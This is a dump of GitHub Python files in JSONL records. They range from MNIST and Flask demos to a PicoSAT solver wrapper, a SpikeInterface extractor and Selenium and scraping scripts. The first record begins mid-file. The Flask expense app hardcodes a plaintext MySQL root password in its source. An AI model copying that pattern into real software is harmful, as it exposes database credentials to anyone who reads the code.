entry[\"media\"][\"averageScore\"]\r\n userAnimeListScores.append(animeTitleScore)\r\n if entry[\"media\"][\"title\"][\"english\"] != None:\r\n animeTitle = entry[\"media\"][\"title\"][\"english\"]\r\n userAnimeList.append(animeTitle)\r\n else:\r\n animeTitle = entry[\"media\"][\"title\"][\"romaji\"]\r\n userAnimeList.append(animeTitle)\r\n # for i in sorted(userAnimeList, key=str.casefold):\r\n # print(i)\r\n else:\r\n raise Exception(f\"Error: {response.status_code}\")\r\n\r\n # -------------------------------------------------------------------\r\n random.shuffle(animeList)\r\n\r\n n = len(userAnimeList)\r\n print(n)\r\n # for i in range(n-1):\r\n # for j in range(0, (n - i - 1)):\r\n # message = userAnimeList[j] + \" or \" + userAnimeList[j + 1] + \"\\n\"\r\n # # userChoice = input(message).upper()\r\n # userChoice = random.randint(0, 1)\r\n # if userChoice == \"L\":\r\n # userAnimeList[j], userAnimeList[j + 1] = userAnimeList[j + 1], userAnimeList[j]\r\n # elif userChoice == \"R\":\r\n # pass\r\n # show top anime at the top rather than bottom\r\n # userAnimeList.reverse()\r\n for i in range(len(userAnimeList)):\r\n print(userAnimeList[i])\r\n print(userAnimeListScores[i])\r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Paisanosen/python-projects","sub_path":"anime-test.py","file_name":"anime-test.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16070241549","text":"import pandas as pd\nimport os\nimport pickle as pkl\nfrom tqdm import tqdm\n\nfrom data_utils.detect_pick_and_roll import detect_pick_and_roll\nfrom data_utils.detect_handoff import detect_handoff\n\n\ndef append_snippet(possession_df, off_id, def_id, index, start, end, out_list):\n copy = possession_df.iloc[start:end].copy()\n if len(copy.index) != (end-start):\n Exception('bad indexes')\n copy.reset_index(inplace=True)\n \n out_list.append({'index': index, 'play': copy, 'off_id': off_id, 'def_id': def_id})\n\ndef generate_data(file_path, save_name):\n file_list = os.listdir(file_path)\n \n window_length = 5 # on both sides: 2 * 5 * 0.12s = 1.2s\n seq_length = 2*window_length\n minimum_time_between = 10\n 
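# Note: per the 0.12 s frame step mentioned above, 2*window_length = 10 frames spans\n    # roughly 1.2 s around an event; events closer than minimum_time_between frames to\n    # the previously kept one are skipped.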
\n # save pick&rolls, handoffs and others in a list\n saved_pr = []\n saved_ho = []\n saved_negatives = []\n \n # go through all files, get the prepared pickle files\n for file in tqdm(file_list):\n if file.endswith(\".pkl\"):\n load_file = file_path + \"/\" + file\n game_df = pkl.load(open(load_file, \"rb\"))\n \n # go through every possession\n for play_index, entry in game_df.iterrows():\n possession_df = entry['possession']\n T = len(possession_df.index)\n \n # label pick&rolls and handoffs\n detect_pick_and_roll(possession_df)\n detect_handoff(possession_df) \n pr_list = possession_df.index[possession_df['is_pick_and_roll'] == True].tolist()\n ho_list = possession_df.index[possession_df['is_handoff'] == True].tolist()\n \n # check if there's a pick&roll or handoff, if not add it to background class\n if len(pr_list) + len(ho_list) > 0:\n last_frame = -99\n t_frame = 0\n while t_frame < T-window_length:\n # exclude events that are very close together\n if abs(t_frame - last_frame) < minimum_time_between:\n t_frame += 1\n continue\n \n #check if whole sequence fits\n start = t_frame+1-window_length\n end = t_frame+1+window_length\n if start < 0 or end > len(possession_df.index):\n t_frame += 1\n continue\n \n if t_frame in ho_list:\n last_frame = t_frame\n append_snippet(possession_df, entry['offense_id'], entry['defense_id'],\n play_index, start, end, saved_ho)\n elif t_frame in pr_list:\n last_frame = t_frame\n append_snippet(possession_df, entry['offense_id'], entry['defense_id'],\n play_index, start, end, saved_pr)\n t_frame += 1\n else:\n # no plays of interest, make snippets for background data\n for t_frame in range(0, T-seq_length, seq_length):\n append_snippet(possession_df, entry['offense_id'], entry['defense_id'],\n play_index, \n t_frame, t_frame+seq_length, \n saved_negatives)\n \n print(f'found {len(saved_pr)} pick&rolls, {len(saved_ho)} handoffs and {len(saved_negatives)} others')\n \n pr_df = pd.DataFrame(saved_pr)\n ho_df = pd.DataFrame(saved_ho)\n negative_df = pd.DataFrame(saved_negatives)\n \n pkl.dump((pr_df, ho_df, negative_df), open(save_name, 'wb'))\n \nif __name__ == '__main__':\n generate_data('saved_data/tactics_weaklabeled.pkl')\n \n ","repo_name":"camzach/NETS-NFL","sub_path":"NETS/extract_tactics.py","file_name":"extract_tactics.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4480968312","text":"from pysmt.exceptions import SolverAPINotFound\n\ntry:\n import picosat\nexcept ImportError:\n raise SolverAPINotFound\n\nfrom six.moves import xrange\nfrom six import iteritems\n\nimport pysmt.logics\nfrom pysmt import typing as types\nfrom pysmt.solvers.solver import Solver\nfrom pysmt.solvers.eager import EagerModel\nfrom pysmt.rewritings import CNFizer\nfrom pysmt.decorators import clear_pending_pop, catch_conversion_error\nfrom pysmt.exceptions import ConvertExpressionError\n\n\nclass PicosatSolver(Solver):\n \"\"\"PicoSAT solver\"\"\"\n\n LOGICS = [ pysmt.logics.QF_BOOL ]\n\n def __init__(self, environment, logic, **options):\n Solver.__init__(self,\n environment=environment,\n logic=logic,\n **options)\n\n self.mgr = environment.formula_manager\n self.pico = picosat.picosat_init()\n self.converter = None\n self.cnfizer = CNFizer(environment=environment)\n self.latest_model = None\n self._var_ids = {}\n\n\n def _get_var_id(self, symbol):\n if not symbol.is_symbol(types.BOOL):\n raise ConvertExpressionError(\"No theory terms are supported in 
PicoSAT\")\n\n if symbol in self._var_ids:\n return self._var_ids[symbol]\n else:\n vid = picosat.picosat_inc_max_var(self.pico)\n self._var_ids[symbol] = vid\n return vid\n\n\n @clear_pending_pop\n def reset_assertions(self):\n picosat.picosat_reset(self.pico)\n self.pico = picosat.picosat_init()\n\n @clear_pending_pop\n def declare_variable(self, var):\n # no need to declare variables\n pass\n\n def _get_pico_lit(self, lit):\n mult = 1\n var = lit\n if lit.is_not():\n mult = -1\n var = lit.arg(0)\n\n vid = self._get_var_id(var)\n return vid * mult\n\n\n @clear_pending_pop\n @catch_conversion_error\n def add_assertion(self, formula, named=None):\n # First, we get rid of True/False constants\n formula = formula.simplify()\n if formula.is_false():\n picosat.picosat_add(self.pico, 0)\n elif not formula.is_true():\n cnf = self.cnfizer.convert(formula)\n self._add_cnf_assertion(cnf)\n\n def _add_cnf_assertion(self, cnf):\n for clause in cnf:\n for lit in clause:\n v = self._get_pico_lit(lit)\n picosat.picosat_add(self.pico, v)\n picosat.picosat_add(self.pico, 0)\n\n @clear_pending_pop\n @catch_conversion_error\n def solve(self, assumptions=None):\n if assumptions is not None:\n cnf = []\n for a in assumptions:\n cnf += self.cnfizer.convert(a)\n\n missing = []\n for clause in cnf:\n if len(clause) == 1:\n v = self._get_pico_lit(next(iter(clause)))\n picosat.picosat_assume(self.pico, v)\n else:\n missing.append(clause)\n\n if len(missing) > 0:\n self.push()\n self._add_cnf_assertion(missing)\n self.pending_pop = True\n\n res = picosat.picosat_sat(self.pico, -1)\n if res == picosat.PICOSAT_SATISFIABLE:\n self.latest_model = self.get_model()\n return True\n else:\n self.latest_model = None\n return False\n\n\n def get_value(self, item):\n if self.latest_model is None:\n self.get_model()\n return self.latest_model.get_value(item)\n\n\n def get_model(self):\n assignment = {}\n for var, vid in iteritems(self._var_ids):\n v = picosat.picosat_deref(self.pico, vid)\n if v == 0:\n assert False\n\n value = self.mgr.Bool(v == 1)\n assignment[var] = value\n\n return EagerModel(assignment=assignment,\n environment=self.environment)\n\n @clear_pending_pop\n def push(self, levels=1):\n for _ in xrange(levels):\n picosat.picosat_push(self.pico)\n\n @clear_pending_pop\n def pop(self, levels=1):\n for _ in xrange(levels):\n picosat.picosat_pop(self.pico)\n\n def _exit(self):\n picosat.picosat_reset(self.pico)\n","repo_name":"Sahanduiuc/pysmt","sub_path":"pysmt/solvers/pico.py","file_name":"pico.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"16144407541","text":"#Escribe una función que cuente el número de vocales en una cadena dada.\ncontador = 0\n\ndef vocales(a):\n\tglobal contador\n\tfor x in a:\n\t\tif (x == \"a\") or (x == \"e\") or (x == \"i\") or (x == \"o\") or (x == \"u\"):\n\t\t\tcontador += 1\n\tprint(contador)\n\ncadena = input(\"Ingresa una cadena:\")\nvocales(cadena)\n\n","repo_name":"arianafm/Python","sub_path":"Tareas/Tarea1/vocales.py","file_name":"vocales.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27867900983","text":"#Modulo\nfrom tkinter import *\n\n#Aba\naba = Tk()\n\n#Title\naba.title('Fill')\n\n#Geometry\naba.geometry('400x400+100+100')\n\n#Background\naba['bg'] = \"Black\"\n\n#Label\nlb1 = Label(aba, text=\"LB1\", bg=\"white\")\nlb2 = Label(aba, text=\"LB2\", bg=\"red\")\nlb3 = 
Label(aba, text=\"LB3\", bg=\"yellow\")\nlb4 = Label(aba, text=\"LB4\", bg=\"blue\")\n\n#Expand\n#Define as areas em igualdade, alem de reajustar automaticamente a tel caso precise\nlb1.pack(side=TOP, fill=BOTH, expand=1)\nlb2.pack(side=TOP, fill=BOTH, expand=1)\nlb3.pack(side=TOP, fill=BOTH, expand=1)\nlb4.pack(side=TOP, fill=BOTH, expand=1)\n\n#Main Loop\naba.mainloop()\n","repo_name":"guilhermeG23/AulasPythonGuanabara","sub_path":"Tkinter/Expand.py","file_name":"Expand.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23627290897","text":"# -*- coding: utf8 -*-\n__author__ = 'Razy.Chen'\nfrom socket_processor import *\nfrom Vm_Class import VirtualMachineInfo\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n#服务端宿主机信息类,用于储存宿主机相关信息,其中包涵虚拟机信息类与跟服务端宿主���通讯的socket_processor对象及其相关函数\nclass HostInfo(QMainWindow):\n def __init__(self,Vcenter):\n QWidget.__init__(self,parent=None)\n #Vcenter实例化对象,用于定义信号\n self.Vcenter=Vcenter\n #宿主机对象对应的vbox命令操作模块,并将自身作为参数传入\n #服务端对应的socket通讯对象\n self.socket_processor=Socket_processor()\n self.socket_processor.vb.host=self\n self.socket_processor.callVcenter=self.hostcallVcenter\n self.connect(self,SIGNAL('callVcenter(QString,QString,QString,QString)'),self.Vcenter.hostcallVcenter)\n self.connect(self,SIGNAL('reportfailure(QString)'),self.Vcenter.reportfailure)\n\n #宿主机FTP状态\n self.FTPstate=False\n\n #宿主机名称\n self.Name=None\n\n #是否连接\n self.isOnline=False\n\n #宿主机IP地址\n self.IPAddr=None\n\n #宿主机操作系统\n self.OSTypeId=None\n\n #宿主机CPU信息\n self.CPUInfo=None\n\n #宿主机CPU物理核心数\n self.CoreCount=None\n\n #宿主机CPU逻辑核心数\n self.CPUCount=None\n\n #宿主机内存大小\n self.MemorySize=None\n\n #宿主机内存当前可用大小\n self.MemoryAvailable=None\n\n #宿主机CPU使用率\n self.CPUUsage=None\n\n #宿主机网络适配器名称(用于虚拟网卡桥接设定)\n self.HostNetworkAdapter=[]\n\n #宿主机VM文件夹所在分区总大小\n self.DiskTotalSize=None\n\n #宿主机VM文件夹所在分区已用大小\n self.DiskUsageSize=None\n\n #宿主机VM文件夹所在分区使用率\n self.DiskUsage=None\n\n #宿主机VM文件夹大小\n self.VboxTotalSize=None\n\n #服务端包含的虚拟机对象列表\n self.VMList=[]\n\n #向Vcenter发送产生错误的信号的函数\n def reportfailure(self,failureMSG):\n failureMSG=str(failureMSG)\n self.emit(SIGNAL('reportfailure(QString)'),failureMSG)\n\n #向Vcenter发送状态的信号的函数\n def hostcallVcenter(self,IPAddr='',state='',reflashtree='',reflash=''):\n state=QString(state)\n reflashtree=QString(reflashtree)\n reflash=QString(reflash)\n self.emit(SIGNAL('callVcenter(QString,QString,QString,QString)'),IPAddr,state,reflashtree,reflash)\n # print('Host.Info.hostcallVcenter')\n # print(IPAddr,state,reflashtree,reflash)\n","repo_name":"pvt54/VboxCenter","sub_path":"Host_Class.py","file_name":"Host_Class.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24015646133","text":"# import numpy as np\n# import mnist\n# from tensorflow import keras\n# from tensorflow.keras.models import Sequential\n# from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\n# from tensorflow.keras.utils import to_categorical\n\n# train_images=mnist.train_images() #load the training images\n# train_labels=mnist.train_labels() #load the training labels\n# test_images=mnist.test_images() #load the test images\n# test_labels=mnist.test_labels() #load the test labels\n\n# # print(train_images.shape) #train_images is a numpy array of shape (60000,28,28)\n# #using the 28x28 images of the mnist dataset to train the model\n# #print(train_labels.shape) \n# #train_labels 
is a numpy array of shape (60000,1) containing the labels of the training data\n\n# train_images=(train_images/255)-0.5 #normalize the images to be between -0.5 and 0.5\n# test_labels=(test_labels/255)-0.5 #normalize the images to be between -0.5 and 0.5\n\n# #print(train_images) #print the normalized training images\n\n# train_images=np.expand_dims(train_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\n# test_images=np.expand_dims(test_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\n\n# num_filters=8 #number of filters in the convolutional layer\n# filter_size=3 #size of the filter\n# pool_size=2 #size of the pooling window\n\n# #create a sequential model\n# model=Sequential([ \n# Conv2D(num_filters,filter_size,input_shape=(28,28,1)),\n# MaxPooling2D(pool_size),\n# Flatten(),\n# Dense(10,activation='softmax')\n# ])\n\n# model.compile('adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n# model.fit(train_images,to_categorical(train_labels),epochs=3,validation_data=(test_images,to_categorical(test_labels)))\n# model.summary() #print the model summary\n# In this code there was an issue during the training of the model; the model was not able to train properly.\n#----------------\n\n#Eng Yazan Code:\nimport numpy as np\nimport mnist\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten\nfrom tensorflow.keras.utils import to_categorical\n\ntrain_images = mnist.train_images()\ntrain_labels = mnist.train_labels()\ntest_images = mnist.test_images()\ntest_labels = mnist.test_labels()\n\ntrain_images = (train_images / 255) - 0.5\ntest_images = (test_images / 255) - 0.5\n\ntrain_images = np.expand_dims(train_images, axis = 3)\ntest_images = np.expand_dims(test_images, axis = 3)\n\nnum_filters = 8\nfilter_size = 3\npool_size = 2\n\nmodel = Sequential([ \n    Conv2D(num_filters, filter_size, input_shape = (28,28,1)),\n    MaxPooling2D(pool_size),\n    Flatten(),\n    Dense(10, activation = 'softmax')\n])\n\nmodel.compile('adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n# model.fit(train_images, to_categorical(train_labels), epochs = 3, validation_data=(test_images,to_categorical(test_labels)))\n\n# model.save_weights('weights.h5') #save the weights of the model first step\n#you must comment out the above lines model.fit() and model.save_weights() to run the line below\n \n#load the weights of the model\nmodel.load_weights('weights.h5')\n\n#predict on the first 20 test images\npredictions = model.predict(test_images[:20])\n\n#print the predictions\nprint(np.argmax(predictions, axis = 1)) \nprint(test_labels[:20]) #print the labels of the test images to compare with the predictions\n\n#to check the accuracy of the model\n","repo_name":"NoorTaamreh/HTU-DataScience","sub_path":"ML/Session40A.py","file_name":"Session40A.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"35048621947","text":"from flask import Flask,send_file,redirect,url_for,render_template,request\nimport yaml\nimport pymysql\nimport io\nimport base64\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\napp=Flask(__name__)\n\nhost = \"127.0.0.1\"\nuser = \"root\"\npassword = \"Mpbirla25@\"\ndb = \"expense\"\ncon = pymysql.connect(host=host , user=user , password=password , db=db , 
cursorclass=pymysql.cursors.DictCursor)\ncursor=con.cursor()\n\nx=[]\ny=[]\n\n@app.route('/input',methods=['GET','POST'])\ndef test():\n if request.method == 'POST':\n user = request.form\n income = user['Income']\n expense = user['Expense']\n cur=con.cursor()\n if income is not None:\n cur.execute(\"INSERT INTO expense.cost(Income,Expense) VALUES(%s,%s)\",(income,expense))\n else:\n cur.execute(\"INSERT INTO expense.cost(Expense) VALUES(%s)\",(expense))\n con.commit()\n\n #return 'success'\n return redirect(url_for('product'))\n return render_template('input.html')\n\n@app.route('/product')\ndef product():\n cursor.execute(\"select Income,Expense from expense.cost\")\n res=cursor.fetchall()\n return render_template(\"product.html\",result=res)\n\nfig,ax=plt.subplots(figsize=(6,6))\nax=sns.set_style(style=\"darkgrid\")\n\n#x=[1,28,34,45,77,78,89,99]\n#y=[10,38,68,78,77,33,64,789]\n\ndef sum(arr):\n s=0\n for i in arr:\n s=s+1\n return s\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\",content=\"Expense Graph\")\n\n@app.route('/visualize')\ndef visualize():\n #x=[]\n #y=[]\n cursor.execute(\"select Income,Expense from expense.cost\")\n res=cursor.fetchall()\n for row in res:\n x.append(row['Income'])\n y.append(row['Expense'])\n #plt.plot(x,y)\n #s=sum(x)\n #res=y[0]-s\n\n z=sns.barplot(y,x)\n z.set(xlabel='Income',ylabel='Expense')\n canvas=FigureCanvas(fig)\n img=io.BytesIO()\n fig.savefig(img)\n img.seek(0)\n return send_file(img,mimetype='img/png')\n\n@app.route('/testy')\ndef testy():\n return render_template(\"testy.html\",array=x)\n\nif __name__=='__main__':\n app.run()\n","repo_name":"diptarkagupta81/Expense-Calculator-with-plotted-Graph-using-Seaborn-Flask","sub_path":"Amphoria/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11277172719","text":"class Solution:\n def divisibilityArray(self, word: str, m: int) -> List[int]:\n res = []\n temp = 0\n for i in word:\n temp = temp*10+int(i)\n if(temp%m): res.append(0)\n else: res.append(1)\n temp%=m\n\n return res","repo_name":"naveen-chokkapu/leetCode","sub_path":"2713-find-the-divisibility-array-of-a-string/find-the-divisibility-array-of-a-string.py","file_name":"find-the-divisibility-array-of-a-string.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24740065780","text":"import glob\nimport numpy as np\nimport random as random\nimport pandas as pd\nfrom math import *\nfrom datetime import datetime\nfrom scipy.stats import rankdata\n\nfrom pipeline_helper_functions import *\nfrom get_edge_data import *\n\n\ndef get_test_cases(G, active_years, num_test_cases, seed=None):\n \"\"\"\n Get a list of test cases\n - test cases must have at least one citation\n - cited case year must be strictly less than citing case year\n\n Parameters\n ----------\n G: igraph object\n\n active_years: list of possible citing years\n\n num_test_cases: number of test cases\n\n seed: seed for sampling vertices\n\n Output\n ------\n returns a list of test cases (igraph vertices)\n \"\"\"\n\n # seed for selecting test cases\n if seed:\n random.seed(seed)\n\n # select cases for sample\n possible_citing_cases = set(G.vs.select(year_ge=min(active_years),\n year_le=max(active_years)))\n\n # other data we might want to keep track of\n test_cases = set()\n\n # run until we get enough test cases\n 
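# (a sampled case is kept only if it cites at least one case from a strictly earlier year)\n    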
while(len(test_cases) < num_test_cases):\n\n # randomly select a case\n test_case = random.sample(possible_citing_cases, 1)[0]\n\n # test case citing year\n ing_year = test_case['year']\n\n # get neighbors first as ig index\n cited_cases = G.neighbors(test_case.index, mode='OUT')\n\n # only keep cited cases coming in years strictly before citing year\n cited_cases_pre = [ig_id for ig_id in cited_cases\n if G.vs[ig_id]['year'] < ing_year]\n\n # only add cases who have at least one citation\n if len(cited_cases_pre) >= 1:\n # make sure case has already been added\n if test_case not in test_cases:\n test_cases.add(test_case)\n\n return list(test_cases)\n\n\ndef get_cited_cases(G, citing_vertex):\n \"\"\"\n Returns the ciations of a cases whose cited year\n is strictly less than citing year\n\n Parameters\n ----------\n G: igraph object\n\n citing_vertex: igraph vertex\n\n Output\n ------\n list of CL ids of cited cases\n \"\"\"\n\n # get neighbors first as ig index\n all_citations = G.neighbors(citing_vertex.index, mode='OUT')\n\n # return CL indices of cases\n # only return cited cases whose year is stictly less than citing year\n return [G.vs[ig_id]['name'] for ig_id in all_citations\n if G.vs[ig_id]['year'] < citing_vertex['year']]\n\n\ndef get_rank_by_metric(edge_data, metric):\n \"\"\"\n Sorts cases by a given metric\n\n Parameters\n ----------\n edge_data: edge data frame\n\n metric: a single column from edge_data\n\n Output\n ------\n CL ids of ranked cases\n \"\"\"\n ranking = pd.DataFrame(columns=['rank'],\n index=[e[1] for e in edge_data.index])\n\n if metric in ['age']: # small is good\n scores = edge_data[metric]\n\n else: # large is goo\n scores = - edge_data[metric]\n\n ranking['rank'] = np.floor(rankdata(scores))\n\n return ranking\n","repo_name":"idc9/law-net","sub_path":"vertex_metrics_experiment/code/experiment_helper_functions.py","file_name":"experiment_helper_functions.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"37050100307","text":"from pg_model import PgModel\nfrom mongo_model import MongoModel\n\ndef main(pg_model, mongo_model):\n # informations migrate\n informations = pg_model.get_informations()\n print(informations)\n\n for information in informations:\n mongo_model.add_information(information[\"title\"], information[\"content\"])\n\n # portfolios migrate\n portfolios = pg_model.get_portfolios()\n print(portfolios)\n\n for portfolio in portfolios:\n mongo_model.add_portfolios(\n portfolio[\"id\"],\n portfolio[\"title\"],\n portfolio[\"content\"],\n portfolio[\"githubLink\"],\n portfolio[\"techStack\"]\n )\n\nif __name__ == \"__main__\":\n main(PgModel(), MongoModel())\n","repo_name":"z3zzz/distributed-tech-stack","sub_path":"api-python/model/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9632210713","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\nheaders = {\"User-Agent\" : \"\"}\n\nfor i in range(1, 3): #원하는 페이지 수\n url = \"https://www.coupang.com/np/search?q=%ED%9C%B4%EB%8C%80%ED%8F%B0&channel=user&component=&eventCategory=SRP&trcid=&traid=&sorter=scoreDesc&minPrice=&maxPrice=&priceRange=&filterType=&listSize=36&filter=&isPriceRange=false&brand=&offerCondition=&rating=0&page={}&rocketAll=false&searchIndexingToken=1=4&backgroundColor=\".format(i)\n print(\"페이지 : \", i)\n print(\"-\"*100)\n res = 
requests.get(url, headers = headers)\n res.raise_for_status()\n soup = BeautifulSoup(res.text, \"lxml\")\n\n items = soup.find_all(\"li\", attrs={\"class\" : re.compile(\"search-product\")})\n\n for item in items:\n \n ad = item.find(\"span\", attrs={\"class\" : \"ad-badge-text\"}) #광고 제외\n if ad: \n continue\n\n name = item.find(\"div\", attrs={\"class\" : \"name\"}).get_text() #제품\n price = item.find(\"strong\", attrs={\"class\" : \"price-value\"}).get_text() #가격\n rate = item.find(\"em\", attrs={\"class\" : \"rating\"}) #평점\n if rate: #평점 없을 경우 패스\n rate = rate.get_text() \n else:\n continue\n\n link = \"https://www.coupang.com\" + item.a[\"href\"] #링크 첨부\n \n\n if float(rate) >= 4.5:\n print(f\"제품 명 : {name}\")\n print(f\"가격 : {price}\")\n print(f\"평점 : {rate}\")\n print(f\"링크 : {link}\")\n print(\"-\"*100)\n\n\n","repo_name":"123qpq/web_scrapping","sub_path":"10_bs4_coupangpage.py","file_name":"10_bs4_coupangpage.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17888321157","text":"from pathlib import Path\n\nfrom spikeinterface.core.core_tools import define_function_from_class\n\nfrom .neobaseextractor import NeoBaseRecordingExtractor, NeoBaseEventExtractor\n\n\nclass AlphaOmegaRecordingExtractor(NeoBaseRecordingExtractor):\n \"\"\"\n Class for reading from AlphaRS and AlphaLab SnR boards.\n\n Based on :py:class:`neo.rawio.AlphaOmegaRawIO`\n\n Parameters\n ----------\n folder_path: str or Path-like\n The folder path to the AlphaOmega recordings.\n lsx_files: list of strings or None, optional\n A list of listings files that refers to mpx files to load.\n stream_id: {'RAW', 'LFP', 'SPK', 'ACC', 'AI', 'UD'}, optional\n If there are several streams, specify the stream id you want to load.\n stream_name: str, optional\n If there are several streams, specify the stream name you want to load.\n all_annotations: bool, default: False\n Load exhaustively all annotations from neo.\n \"\"\"\n\n mode = \"folder\"\n NeoRawIOClass = \"AlphaOmegaRawIO\"\n name = \"alphaomega\"\n\n def __init__(self, folder_path, lsx_files=None, stream_id=\"RAW\", stream_name=None, all_annotations=False):\n neo_kwargs = self.map_to_neo_kwargs(folder_path, lsx_files)\n NeoBaseRecordingExtractor.__init__(\n self, stream_id=stream_id, stream_name=stream_name, all_annotations=all_annotations, **neo_kwargs\n )\n self._kwargs.update(dict(folder_path=str(Path(folder_path).absolute()), lsx_files=lsx_files))\n\n @classmethod\n def map_to_neo_kwargs(cls, folder_path, lsx_files=None):\n neo_kwargs = {\n \"dirname\": str(folder_path),\n \"lsx_files\": lsx_files,\n }\n return neo_kwargs\n\n\nclass AlphaOmegaEventExtractor(NeoBaseEventExtractor):\n \"\"\"\n Class for reading events from AlphaOmega MPX file format\n \"\"\"\n\n mode = \"folder\"\n NeoRawIOClass = \"AlphaOmegaRawIO\"\n handle_event_frame_directly = True\n\n def __init__(self, folder_path):\n neo_kwargs = self.map_to_neo_kwargs(folder_path)\n NeoBaseEventExtractor.__init__(self, **neo_kwargs)\n\n @classmethod\n def map_to_neo_kwargs(cls, folder_path):\n neo_kwargs = {\"dirname\": str(folder_path)}\n return neo_kwargs\n\n\nread_alphaomega = define_function_from_class(source_class=AlphaOmegaRecordingExtractor, name=\"read_alphaomega\")\nread_alphaomega_event = define_function_from_class(source_class=AlphaOmegaEventExtractor, 
name=\"read_alphaomega_event\")\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/extractors/neoextractors/alphaomega.py","file_name":"alphaomega.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"9498601103","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport pyautogui\r\n\r\n#Dimensões da tela: 1920 x 1080\r\n\r\n# Inicializar o WebDriver do Chrome\r\ndriver = webdriver.Edge()\r\n\r\n# Acessar o site do Trivago\r\ndriver.get(\"http://www.trivago.com.br\")\r\ntime.sleep(10)\r\n\r\nsearch_form = driver.find_element(By.XPATH, \"//span[@data-testid='search-form-destination-value']\")\r\nsearch_form.click()\r\ntime.sleep(5)\r\n\r\n# Digitar \"Manaus\" no campo de busca\r\nsearch_input = driver.find_element(by=By.ID, value=\"input-auto-complete\")\r\nsearch_input.click()\r\nsearch_input.click()\r\nsearch_input.send_keys(\"Manaus\")\r\ntime.sleep(5)\r\n#Clicar enter\r\npyautogui.press('enter')\r\npyautogui.press('enter')\r\ntime.sleep(5)\r\n\r\n#Confirmar data\r\n#Dia 05\r\ndatee_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/main/div/div/div/div[2]/div[1]/div/button[9]/time\")\r\ndatee_button.click()\r\n#Dia 06\r\ndatee_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/main/div/div/div/div[2]/div[1]/div/button[10]/time\")\r\ndatee_button.click()\r\ntime.sleep(5)\r\n\r\n#Aplicar Data\r\napply_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/footer/div/div/div/button[2]\")\r\napply_button.click()\r\ntime.sleep(5)\r\n\r\n#Confirmar reserva\r\nreserva_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/footer/div/div/div/button[2]\")\r\nreserva_button.click()\r\ntime.sleep(5)\r\n\r\n#Clicar em pesquisar\r\npesquisa_button = driver.find_element(by=By.XPATH, value=\"//*[@id='__next']/div[1]/div[1]/section/div[2]/div[2]/div/button\")\r\npesquisa_button.click()\r\ntime.sleep(5)\r\n\r\n#Screenshot da tela de requisição\r\ndriver.save_screenshot(\"tela_de_requisicao.png\")\r\nprint(\"Screenshot da tela de requisicao!\")\r\ntime.sleep(3)\r\n\r\n#Tempo de espera da requisicao do site\r\ntime.sleep(50)\r\npyautogui.press('enter')\r\npyautogui.press('enter')\r\ntime.sleep(50)\r\n\r\n# Dimensões da tela\r\nlargura, altura = pyautogui.size()\r\nprint(f\"Dimensões da tela: {largura} x {altura}\")\r\n\r\n# Obtém a posição atual do cursor\r\nposicao_atual = pyautogui.position()\r\nprint(f\"Posição atual do cursor: {posicao_atual.x}, {posicao_atual.y}\")\r\n\r\n# Coordenadas do botão de pesquisa\r\nx = 897\r\ny = 239\r\n\r\n# Movre o mouse para as coordenadas do botão de pesquisa e clica\r\npyautogui.moveTo(x, y)\r\npyautogui.click()\r\n\r\n#filtrar por avaliacao\r\navaliacao_filtro = driver.find_element(by=By.XPATH, value=\"//*[@id='sorting-selector']/option[2]\")\r\navaliacao_filtro.click()\r\ntime.sleep(5)\r\npyautogui.press('enter')\r\n\r\n#clicar fora para sumir a tela de filtro\r\nx = 447\r\ny = 393\r\npyautogui.moveTo(x, 